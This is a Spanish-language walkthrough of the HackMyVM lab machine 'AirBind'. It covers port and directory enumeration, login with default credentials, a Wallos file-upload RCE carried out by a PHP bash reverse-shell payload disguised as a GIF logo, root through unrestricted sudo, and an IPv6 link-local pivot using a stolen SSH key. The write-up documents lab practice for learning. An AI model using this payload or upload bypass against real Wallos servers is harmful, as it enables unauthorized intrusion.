cd ~/blog

~/writeups/hmv/011-airbind.md

011 - AirBind

medium Linux hmv 10-02-2025
Wallos < 1.11.2 File Upload RCEsudo ALL PrivescIPv6 link-local pivot to inner host
hackmyvm.eu/machines/machine.php?vm=AirBind

~1 min de lectura


Enumeración

Comenzamos con un escaneo general y específico de puertos con nmap:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.13
 nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.13
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-10 20:46 -03
Nmap scan report for 192.168.1.13
Host is up (0.00028s latency).

PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.57 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.57 (Ubuntu)
| http-title: Wallos - Subscription Tracker
|_Requested resource was login.php

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds

SSH aparece como filtered y la web del puerto 80 es Wallos, un gestor de suscripciones.

Enumeramos directorios con gobuster:

 gobuster dir -u 'http://192.168.1.13' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -r
...
/images               (Status: 200) [Size: 2968]
/index.php            (Status: 200) [Size: 1924]
/about.php            (Status: 200) [Size: 1924]
/login.php            (Status: 200) [Size: 1924]
/logos.php            (Status: 200) [Size: 1977]
/stats.php            (Status: 200) [Size: 1924]
/screenshots          (Status: 200) [Size: 1999]
/scripts              (Status: 200) [Size: 2313]
/registration.php     (Status: 200) [Size: 1924]
/includes             (Status: 200) [Size: 3710]
/db                   (Status: 200) [Size: 932]
/logout.php           (Status: 200) [Size: 1924]
/styles               (Status: 200) [Size: 1975]
/settings.php         (Status: 200) [Size: 1924]
/auth.php             (Status: 200) [Size: 0]
/libs                 (Status: 200) [Size: 937]
...

RCE en Wallos (File Upload)

En el login entramos con las credenciales por defecto admin:admin. Una vez dentro, comprobamos la versión del sistema (Wallos v1.11.0) y buscamos vulnerabilidades conocidas:

 searchsploit wallos
...
Wallos < 1.11.2 - File Upload RCE | php/webapps/51924.txt
...

La vulnerabilidad se explota subiendo una reverse shell como logo de una suscripción y ajustando algunos detalles de la petición: anteponemos la cabecera mágica GIF89a; y cambiamos el Content-Type a image/jpeg para evadir las comprobaciones:

------WebKitFormBoundaryIWPlbo4XOJgqYNs8
Content-Disposition: form-data; name="logo"; filename="pwned.php"
Content-Type: image/jpeg

GIF89a;

<?php
    shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'");
?>

Obtenemos el mensaje de éxito y accedemos a la ruta del logo subido:

{"status":"Success","message":"Subscription added successfully"}
 ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.13:44258.
bash: cannot set terminal process group (214): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/images/uploads/logos$

(La ruta del logo en este caso fue http://192.168.1.13/images/uploads/logos/1739232215-pwned.php.)

Escalada a root del contenedor (sudo ALL)

Revisamos sudo -l:

www-data@ubuntu:/home$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL

Podemos ejecutar cualquier comando como cualquier usuario y sin contraseña, así que lanzamos una bash de root:

www-data@ubuntu:/home$ sudo bash
root@ubuntu:/home#

Obtenemos la primera flag y una id_rsa.

Pivote IPv6 a la máquina interna

Esta máquina es en realidad un contenedor; el SSH real (que nmap veía filtered) está en otra interfaz. Revisamos la tabla de rutas:

root@ubuntu:~# ip route
default via 10.0.3.1 dev eth0 proto static
10.0.3.0/24 dev eth0 proto kernel scope link src 10.0.3.241

Como por IPv4 el gateway no nos da SSH accesible, descubrimos al host vecino mediante IPv6 link-local, haciendo ping al multicast ff02::1 (todos los nodos del enlace) desde nuestra interfaz:

root@ubuntu:~/.ssh# nc 10.0.3.1 22 -v

 ping -6 -I wlo1 ff02::1
...
64 bytes from fe80::a00:27ff:feca:3aa1%wlo1: icmp_seq=1 ttl=64 time=0.779 ms
...

Escaneamos ese host por su dirección link-local:

 nmap -6 fe80::a00:27ff:feca:3aa1%wlo1
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-10 22:13 -03
Nmap scan report for fe80::a00:27ff:feca:3aa1
Host is up (0.00019s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds

Y finalmente nos conectamos por SSH con la id_rsa a la máquina interna airbind:

 ssh root@fe80::a00:27ff:feca:3aa1%wlo1 -i id_rsa
The authenticity of host 'fe80::a00:27ff:feca:3aa1%wlo1 (fe80::a00:27ff:feca:3aa1%wlo1)' can't be established.
ED25519 key fingerprint is SHA256:La9YyHs4GERVO8XTRRw0cLh6XcInXX35Ar9OiMsXwQk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'fe80::a00:27ff:feca:3aa1%wlo1' (ED25519) to the list of known hosts.
Linux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@airbind:~#

Obtenemos la segunda flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados